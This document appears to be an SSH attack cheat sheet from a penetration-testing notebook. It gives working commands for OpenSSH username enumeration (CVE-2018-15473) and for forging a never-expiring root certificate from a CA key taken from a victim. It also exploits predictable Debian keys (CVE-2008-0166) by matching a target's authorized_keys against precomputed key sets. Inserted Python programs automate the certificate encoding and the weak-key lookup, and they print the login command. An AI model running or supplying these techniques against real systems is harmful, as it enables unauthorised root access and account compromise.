22 ) SSH
User Enumeration (OpenSSH <= 7.7 | CVE-2018-15473)
## ------------------| Using MSF
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <IP>
set USER_FILE userlist.txt
run
## ------------------| Using Python
git clone https://gitlab.com/epi052/cve-2018-15473.git && cd cve-2018-15473
pip install -r requirements.txt
python3 ssh-username-enum.py -w userlist.txt <IP>
SSH login with options
## ------------------| Disable public-key auth and force password auth [useful e.g. for Windows targets running OpenSSH, or when the agent offers too many keys]
ssh -o PubkeyAuthentication=no user@host
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@host
## ------------------| Legacy KEX / host key algorithms for old servers (modern clients refuse them by default)
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -o HostKeyAlgorithms=+ssh-dss user@host
## ------------------| Prevents ssh from attempting to save the host key
ssh -o UserKnownHostsFile=/dev/null user@host
## ------------------| Instruct ssh to not prompt us to accept the host key
ssh -o StrictHostKeyChecking=no user@host
## ------------------| Escape rbash (run an unrestricted bash instead of the restricted login shell; -t allocates a tty so the shell is interactive)
ssh -t user@host bash
## ------------------| Using sshpass (password from a file or on the command line; -p exposes it in the process list)
sshpass -f <password_file> ssh <user>@<IP>
sshpass -p <password> ssh <user>@<ip>
SSH Certificate-Based Authentication for Root Access
## ------------------| Background
### This method allows you to generate an SSH certificate that grants root access
### using a trusted Certificate Authority (CA) key.
## ------------------| Prerequisites
### You already have the CA private key (ca_key) and its corresponding public key (ca_key.pub), e.g. obtained from the victim.
### The CA public key (ca_key.pub) is listed in the SSH server's configuration (/etc/ssh/sshd_config.d/sshcerts.conf)
### The entry should look like this --> TrustedUserCAKeys /etc/ssh/ca_key.pub
## ------------------| Getting root access
ssh-keygen -t ed25519 -f root
ssh-keygen -s <private_key_from_victim> -z 223 -I 'root' -V -5m:forever -n root root.pub
#### -s <private_key_from_victim> : the CA private key used for signing (the ca_key from the prerequisites).
#### -z 223 : serial number (any value works; it only identifies the issued certificate, e.g. for revocation lists).
#### -I 'root' : key identity, a free-form label that shows up in the server's auth log.
#### -V -5m:forever : validity period:
######## -5m : starts 5 minutes in the past (to avoid clock drift issues).
######## forever : the certificate never expires.
######## to have it expire in 42 weeks instead --> -V -5m:+42w
#### -n root : the principal list. With TrustedUserCAKeys (and no AuthorizedPrincipalsFile) sshd accepts the cert only if the login name is in this list, so it must contain "root" and is useless for any other user.
#### root.pub : the public key being signed; the certificate is written next to it as root-cert.pub.
ssh-keygen -L -f root-cert.pub
chmod 600 root
ssh -i root root@<IP>
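To see what the ssh-keygen flags above actually put into the certificate and what sshd checks against them, here is an added example (not from this page or from OpenSSH) in Python using only the standard library. It encodes an ssh-ed25519 user certificate with the same serial, key ID, principal list and validity window as the command above, parses it back field by field, and applies the server-side checks that explain why -n must name the login user and why -5m:forever never expires. The CA signature field is left empty (no signing library is used), the key bytes are constructed placeholders, and parse_cert also reads a real one-line root-cert.pub, so it can be pointed at the certificate ssh-keygen -s produced.

```python
import base64
import struct
import time

CERT_TYPE = b"ssh-ed25519-cert-v01@openssh.com"
USER_CERT = 1                   # cert type field: 1 = user, 2 = host
FOREVER = 0xFFFFFFFFFFFFFFFF    # what "forever" becomes in the valid_before field
_UNITS = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}

def _string(b: bytes) -> bytes:
    """SSH wire 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b

def validity_interval(spec, now):
    """Turn a relative ssh-keygen -V spec ('-5m:forever', '-5m:+42w', 'always:+1d')
    into the (valid_after, valid_before) epoch pair stored in the certificate.
    Absolute YYYYMMDD[HHMM[SS]] forms are not handled by this helper."""
    def rel(tok):
        if tok == "always":
            return 0
        if tok == "forever":
            return FOREVER
        sign = -1 if tok[0] == "-" else 1
        return now + sign * int(tok[1:-1]) * _UNITS[tok[-1]]
    start, end = spec.split(":")
    return rel(start), rel(end)

def encode_user_cert(pubkey32, serial, key_id, principals, valid_after, valid_before, ca_pub32):
    """Assemble an ssh-ed25519 user certificate in the field order of OpenSSH's
    PROTOCOL.certkeys. The trailing CA signature is left empty (no signing library
    here); ssh-keygen -s produces the real, signed blob."""
    body = (
        _string(CERT_TYPE)
        + _string(b"\x00" * 32)                                   # nonce (random in real certs)
        + _string(pubkey32)                                       # user public key being signed (root.pub)
        + struct.pack(">Q", serial)                               # -z
        + struct.pack(">I", USER_CERT)
        + _string(key_id.encode())                                # -I
        + _string(b"".join(_string(p.encode()) for p in principals))  # -n
        + struct.pack(">Q", valid_after)                          # -V start
        + struct.pack(">Q", valid_before)                         # -V end
        + _string(b"") + _string(b"") + _string(b"")              # critical options, extensions, reserved
        + _string(_string(b"ssh-ed25519") + _string(ca_pub32))    # signature key (the CA public key)
        + _string(b"")                                            # signature placeholder
    )
    return CERT_TYPE.decode() + " " + base64.b64encode(body).decode() + " " + key_id

def parse_cert(cert_line):
    """Read the fields sshd decides on from a one-line certificate (root-cert.pub format)."""
    blob = base64.b64decode(cert_line.split()[1])
    pos = 0

    def rd_string():
        nonlocal pos
        (n,) = struct.unpack(">I", blob[pos:pos + 4])
        pos += 4
        val = blob[pos:pos + n]
        pos += n
        return val

    def rd_uint(fmt, size):
        nonlocal pos
        (v,) = struct.unpack(fmt, blob[pos:pos + size])
        pos += size
        return v

    ctype = rd_string().decode()
    rd_string()                                  # nonce
    if ctype == "ssh-ed25519-cert-v01@openssh.com":
        rd_string()                              # pk
    elif ctype == "ssh-rsa-cert-v01@openssh.com":
        rd_string(); rd_string()                 # e, n
    else:
        raise ValueError("unsupported certificate type: " + ctype)
    serial = rd_uint(">Q", 8)
    kind = rd_uint(">I", 4)
    key_id = rd_string().decode()
    raw, principals, p = rd_string(), [], 0
    while p < len(raw):                          # principals are packed SSH strings
        (n,) = struct.unpack(">I", raw[p:p + 4])
        principals.append(raw[p + 4:p + 4 + n].decode())
        p += 4 + n
    return {"serial": serial, "type": kind, "key_id": key_id, "principals": principals,
            "valid_after": rd_uint(">Q", 8), "valid_before": rd_uint(">Q", 8)}

def cert_allows_login(cert_line, username, now=None):
    """The checks sshd applies to a TrustedUserCAKeys certificate besides the
    signature: user type, a non-empty principal list containing the login name
    (no AuthorizedPrincipalsFile configured), and now inside [valid_after, valid_before)."""
    c = parse_cert(cert_line)
    now = int(time.time()) if now is None else now
    if c["type"] != USER_CERT:
        return False
    if not c["principals"] or username not in c["principals"]:
        return False
    return c["valid_after"] <= now < c["valid_before"]

if __name__ == "__main__":
    now = int(time.time())
    cert = encode_user_cert(b"\x11" * 32, 223, "root", ["root"], *validity_interval("-5m:forever", now), b"\x22" * 32)
    print(parse_cert(cert))
    print("root:", cert_allows_login(cert, "root"), "alice:", cert_allows_login(cert, "alice"))
```

Run `ssh-keygen -L -f root-cert.pub` on the real certificate and compare with `parse_cert(open("root-cert.pub").read())`: the Serial, Key ID, Principals and Valid lines map one to one onto the fields decoded here.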
CVE-2008-0166 (Debian-based systems | September 2006 <--> 2008 May 13th)
https://www.exploit-db.com/exploits/5720
Predictable PRNG Brute Force SSH
## ------------------| Info
## OpenSSL 0.9.8c-1 <= version < 0.9.8g-9 (Debian and derivatives): the patched RNG was seeded from little more than the process ID, so every generated key falls into a small precomputable set.
## You need the target's authorized_keys file on your machine (e.g. read via LFI or an exposed share) to know which weak key to look for.
## ------------------| Setup
## Add "PubkeyAcceptedKeyTypes +ssh-dss" to /etc/ssh/ssh_config (needed for ssh-dss keys; newer OpenSSH spells the option PubkeyAcceptedAlgorithms, and the most recent releases have dropped DSA support entirely, so keep an older client around for DSA keys)
git clone https://github.com/g0tmi1k/debian-ssh
## The archives below are the same ones shipped in common_keys/ of that repo
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_dsa_1024_x86.tar.bz2
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2
## extract one archive per tar call (with two globbed files tar would treat the second as a member name)
for f in *.bz2; do tar -xjf "$f"; done
## Check whether any key from authorized_keys is in the extracted set.
## Copy the first 40-odd chars of the base64 blob from authorized_keys and search the extracted directory for it
grep -lr 'AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNA' .
## The leading ~20 chars (AAAAB3NzaC1kc3MAAACBA...) are the generic ssh-dss header shared by every 1024-bit DSA key, so take enough characters beyond it, or grep for the whole blob, to avoid false matches.
## After finding the matching .pub, the corresponding private key is the file with the same name in the same directory (without .pub).
ssh -i key -oKexAlgorithms=+diffie-hellman-group1-sha1 <USER>@$IP
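A more robust version of the grep step, as an added example (not part of this page or of the debian-ssh repository): it parses authorized_keys including lines that carry a leading options field such as from="...", indexes every *.pub under the extracted directory by its full base64 blob, and reports both how many files a prefix search of the page's length would hit and the single exact match, then builds the login command with the legacy options. The sample repository tree and the key blobs are constructed placeholders written to a temporary directory (they are not weak keys); the file layout, private key beside its .pub with the same name, follows the page's description.

```python
import os
import re
import tempfile

# One regex for authorized_keys lines and *.pub files: it tolerates a leading
# options field (from="...", command="...") before the key type.
KEY_RE = re.compile(r"(ssh-dss|ssh-rsa|ssh-ed25519|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)\s*(.*)$")

# Constructed sample data: the blobs only share the generic ssh-dss header and
# then diverge; they are placeholders, not keys from the debian-ssh repository.
DSA_HEADER = "AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNA"
SAMPLE_REPO = {
    "dsa/1024/aaaa1111-1234.pub": f"ssh-dss {DSA_HEADER}PLACEHOLDER1= root@box\n",
    "dsa/1024/aaaa1111-1234": "-----BEGIN DSA PRIVATE KEY-----\n(placeholder)\n-----END DSA PRIVATE KEY-----\n",
    "dsa/1024/bbbb2222-5678.pub": f"ssh-dss {DSA_HEADER}PLACEHOLDER2= root@box\n",
    "dsa/1024/bbbb2222-5678": "-----BEGIN DSA PRIVATE KEY-----\n(placeholder)\n-----END DSA PRIVATE KEY-----\n",
}
AUTHORIZED_KEYS = (
    "# constructed authorized_keys taken from the target\n"
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnotweak= alice@laptop\n"
    f'from="10.0.0.0/8",no-pty ssh-dss {DSA_HEADER}PLACEHOLDER2= bob@target\n'
)

def make_sample_repo():
    """Write the constructed tree to a temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="debian-ssh-")
    for rel, content in SAMPLE_REPO.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root

def parse_key_lines(text):
    """Return (keytype, base64 blob, comment) for every key line, skipping comments."""
    keys = []
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.search(line)
        if m and not line.startswith("#"):
            keys.append((m.group(1), m.group(2), m.group(3).strip()))
    return keys

def index_weak_keys(root):
    """Map full public-key blob -> private key path (same name minus .pub)."""
    idx = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".pub"):
                path = os.path.join(dirpath, fn)
                with open(path) as fh:
                    for _, blob, _ in parse_key_lines(fh.read()):
                        idx[blob] = path[:-4]
    return idx

def find_weak_keys(authorized_keys_text, repo_root, prefix_len=48):
    """For each authorized key, count how many repo keys a prefix grep of
    prefix_len chars would return and resolve the exact full-blob match."""
    idx = index_weak_keys(repo_root)
    results = []
    for ktype, blob, comment in parse_key_lines(authorized_keys_text):
        prefix = blob[:prefix_len]
        results.append({
            "comment": comment,
            "type": ktype,
            "prefix_candidates": sum(b.startswith(prefix) for b in idx),
            "private_key": idx.get(blob),
        })
    return results

def ssh_command(hit, user, ip):
    """Login command for a confirmed hit, with the legacy options a 2008-era
    Debian sshd and an ssh-dss key need on a modern client (None if no match)."""
    if hit["private_key"] is None:
        return None
    opts = "-oKexAlgorithms=+diffie-hellman-group1-sha1"
    if hit["type"] == "ssh-dss":
        opts += " -oPubkeyAcceptedKeyTypes=+ssh-dss"
    return f"ssh -i {hit['private_key']} {opts} {user}@{ip}"

if __name__ == "__main__":
    for hit in find_weak_keys(AUTHORIZED_KEYS, make_sample_repo()):
        print(hit["comment"], "prefix candidates:", hit["prefix_candidates"],
              "exact:", hit["private_key"], "->", ssh_command(hit, "root", "10.0.0.5"))
```

On a real run point `find_weak_keys` at the directory the tar archives were extracted into; the prefix count shows how many files the page's grep would have returned while `private_key` is the only file whose whole blob matches.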